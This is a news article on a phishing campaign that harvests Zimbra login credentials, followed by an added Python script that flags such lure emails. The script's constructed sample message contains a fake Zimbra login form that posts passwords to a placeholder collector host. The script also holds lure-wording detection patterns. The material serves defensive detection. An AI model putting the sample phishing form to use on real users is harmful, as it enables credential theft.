
Phishing Attack Hits Hundreds of Zimbra Customers Across 4 Continents

A significant share of Zimbra’s user base has been targeted in a campaign that harvests login credentials.

A widespread phishing campaign has targeted customers of the Zimbra Collaboration software suite, impacting hundreds of organizations across several countries.

Zimbra, known for its collaboration suite built around an email server and web client, serves as an alternative to the mainstream enterprise email platforms, although it holds a much smaller market share, as indicated by user statistics from Enlyft and 6sense.

Throughout the year, Zimbra has faced various security challenges, including a remote code execution vulnerability, a zero-day cross-site scripting issue, and an infostealing campaign attributed to North Korea.

ESET researchers reveal that an unidentified threat actor has been conducting a broad phishing campaign since April 2023, targeting Zimbra’s privileged account credentials. While primarily focusing on small-to-midsized businesses (the primary customer base for Zimbra’s open-core software), the campaign also ensnared some government organizations.

The campaign has affected ‘hundreds of different organizations,’ according to Anton Cherepanov, Senior Malware Researcher at ESET. Nevertheless, it’s challenging to quantify the full extent of the damage since most attacks were intercepted before causing harm.

Zimbra Users Under Attack in Phishing Campaign

Every attack follows the same pattern: a generic phishing email, made to look as if it came from Zimbra, carries an urgent pretext such as a server update or a pending account deactivation, and asks the recipient to open an attachment. For instance, a message titled ‘Important Information from Zimbra Security Service’ might read:

Commencing on 3/7/2023, your Zimbra web client login page is undergoing changes. We are making preparations for an email update. To prevent deactivation and ensure continued access to your email account, please review the attachment for download instructions.

Consequences for Zimbra Customers

Users who follow the attachment and type their password into the fraudulent Zimbra login page it leads to hand that credential straight to the attackers.
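The lure just described (a Zimbra-branded display name on an external sender, deactivation wording, and an attachment that leads to a fake login form) is something a mail gateway or a triage script can screen for. What follows is an added example for this page, not code from ESET’s research or from Zimbra: the two sample messages, the addresses and the hostnames in them are constructed for the illustration and are not indicators from the campaign, and the script assumes the attachment is an HTML file that embeds the fake login form (the post itself only says the attachment carries the instructions), which is the case the third check looks for.

```python
import email
import email.policy
import email.utils
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample messages (not real campaign artifacts). The sender and
# collector hosts use the reserved .invalid TLD so nothing here resolves.
LURE_EML = """\
From: "Zimbra Security Service" <notice@mail-lure.invalid>
To: jdoe@victim-corp.example
Subject: Important Information from Zimbra Security Service
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain; charset="utf-8"

Commencing on 3/7/2023, your Zimbra web client login page is undergoing
changes. To prevent deactivation and ensure continued access to your email
account, please review the attachment for download instructions.

--B1
Content-Type: text/html; name="Zimbra_Update.html"
Content-Disposition: attachment; filename="Zimbra_Update.html"

<html><body>
<form method="post" action="http://collector.mail-lure.invalid/zimbra/">
  <input type="text" name="username" value="jdoe@victim-corp.example">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>

--B1--
"""

BENIGN_EML = """\
From: "IT Helpdesk" <helpdesk@victim-corp.example>
To: jdoe@victim-corp.example
Subject: Printer maintenance on Friday
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"

The 3rd floor printer will be offline Friday morning for maintenance.
"""

# Wording taken from the lure quoted in the post; extend with your own.
LURE_PHRASES = (
    "zimbra security service",
    "prevent deactivation",
    "login page is undergoing changes",
)


class _FormScanner(HTMLParser):
    """Records each <form> action and whether that form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "form":
            self._current = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_message(raw: str, trusted_domains) -> dict:
    """Screen one RFC 5322 message; returns {'verdict': ..., 'findings': [...]}.

    trusted_domains: the domains your real mail and Zimbra web client live on.
    Anything claiming to be Zimbra from elsewhere is treated as suspect.
    """
    msg = email.message_from_string(raw, policy=email.policy.default)
    findings = []

    # 1. Display name says "Zimbra" but the sender domain is not ours.
    name, addr = email.utils.parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2].lower()
    if "zimbra" in name.lower() and sender_domain not in trusted_domains:
        findings.append(f"Zimbra-branded display name from external domain {sender_domain}")

    # 2. Urgency / deactivation wording in the subject or text body.
    body = msg.get_body(preferencelist=("plain", "html"))
    text = msg.get("Subject", "") + " " + (body.get_content() if body else "")
    text = " ".join(text.lower().split())  # fold line breaks so phrases match
    hits = [p for p in LURE_PHRASES if p in text]
    if hits:
        findings.append("lure wording: " + ", ".join(hits))

    # 3. HTML attachment whose form posts a password to a host we do not own.
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = _FormScanner()
        scanner.feed(part.get_content())
        for form in scanner.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            if form["has_password"] and host not in trusted_domains:
                findings.append(f"attachment {part.get_filename()} posts a password to "
                                f"{host or '(relative URL)'}")

    # Wording alone is weak evidence; a spoofed sender or an off-site
    # credential form is what makes the message suspicious.
    strong = any(not f.startswith("lure wording") for f in findings)
    return {"verdict": "suspicious" if strong else "clean", "findings": findings}


if __name__ == "__main__":
    for label, raw in (("lure", LURE_EML), ("benign", BENIGN_EML)):
        result = analyze_message(raw, {"victim-corp.example"})
        print(label, result["verdict"], *result["findings"], sep="\n  ")
```

The three checks are deliberately independent: the wording check catches this campaign’s template but is easy for the next one to change, whereas a Zimbra-branded sender on a foreign domain, or an attached form that posts a password anywhere but your own web client, is a property of the technique rather than of one lure, so those are the findings that decide the verdict.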

Anton Cherepanov notes, ‘The worst-case scenario involves attackers obtaining Zimbra Administrator privileges and potentially gaining root privileges on the server itself. However, this outcome depends on several factors, including potential password reuse and configuration specifics.’

Poland is the country hit hardest by this campaign, followed by Ecuador and Italy. The attacks have also reached countries as far apart as Mexico, Kazakhstan, and the Netherlands. The one thing the targets have in common is that they run Zimbra.

To reduce the risk of compromise, Cherepanov recommends standard security practices: strong, unique passwords, multi-factor authentication, and keeping Zimbra updated to the latest version.